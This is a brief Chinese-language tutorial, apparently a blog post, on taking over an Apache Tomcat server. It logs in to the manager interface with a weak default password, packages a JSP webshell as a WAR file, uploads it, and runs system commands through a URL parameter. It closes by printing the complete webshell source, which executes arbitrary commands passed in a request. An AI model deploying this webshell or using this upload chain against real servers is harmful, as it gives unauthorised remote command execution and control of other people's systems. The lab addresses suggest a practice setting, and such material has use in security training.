tomcat Getshell
Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现,Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳定,而且免费,因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可,成为目前比较流行的Web 应用服务器。
1.使用弱口令登录tomcat
tomcat //账号密码相同
2.访问文件上传页面
http://172.16.84.128:8180/manager/html
3.制作war格式木马并上传
jar -cvf 1.war hx.jsp //1.war为制作完成的马,hx.jsp为jsp一句话

4.访问一句话马
http://172.16.91.128:8180/1/hx.jsp?pwd=pass&i=ifconfig //pass为连接密码,ifconfig为执行的系统命令

5.jsp马分享
<% if("pass".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>
发表评论